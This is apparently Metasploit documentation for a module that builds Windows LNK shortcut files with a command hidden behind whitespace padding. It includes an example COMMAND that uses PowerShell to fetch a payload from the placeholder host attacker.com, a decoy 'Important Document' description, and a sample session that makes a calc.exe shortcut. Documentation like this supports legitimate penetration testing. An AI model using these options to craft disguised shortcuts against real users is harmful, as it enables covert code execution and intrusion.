documentation/modules/auxiliary/fileformat/datablock_padding_lnk.md
Windows systems where LNK files are processed, such as in Explorer or when shortcuts are executed. This can lead to arbitrary command execution via manipulated command line buffers.
References:
Disclosure Date: 2025-07-19.
use auxiliary/fileformat/windows_lnk_padding.run.The command to execute when the LNK is opened.
Default: C:\\Windows\\System32\\calc.exe
Example:
set COMMAND powershell.exe -c "Invoke-WebRequest -Uri http://attacker.com/payload"
Optional description for the LNK file. If not set, a random sentence is generated.
Example:
set DESCRIPTION Important Document
Optional path to an icon for the LNK file. If not set, a random system icon path is generated.
Example:
set ICON_PATH %SystemRoot%\\System32\\shell32.dll
The size of the whitespace padding buffer before the command (must be sufficient to avoid truncation).
Default: 900
Example:
set BUFFER_SIZE 1000
Target: Any Windows system (e.g., Windows 10 or later).
Generate an LNK that launches Calculator with custom padding:
msf > use auxiliary/fileformat/windows_lnk_padding
msf auxiliary(fileformat/windows_lnk_padding) > set FILENAME calc.lnk
FILENAME => calc.lnk
msf auxiliary(fileformat/windows_lnk_padding) > set COMMAND C:\\Windows\\System32\\calc.exe
COMMAND => C:\\Windows\\System32\\calc.exe
msf auxiliary(fileformat/windows_lnk_padding) > set BUFFER_SIZE 900
BUFFER_SIZE => 900
msf auxiliary(fileformat/windows_lnk_padding) > set DESCRIPTION Calculator Shortcut
DESCRIPTION => Calculator Shortcut
msf auxiliary(fileformat/windows_lnk_padding) > set ICON_PATH %SystemRoot%\\System32\\calc.exe
ICON_PATH => %SystemRoot%\\System32\\calc.exe
msf auxiliary(fileformat/windows_lnk_padding) > run
[*] Generating LNK file: calc.lnk
[+] Successfully created calc.lnk
[*] Command line buffer size: 900 bytes
[*] Target command: C:\\Windows\\System32\\calc.exe
[*] Auxiliary module execution completed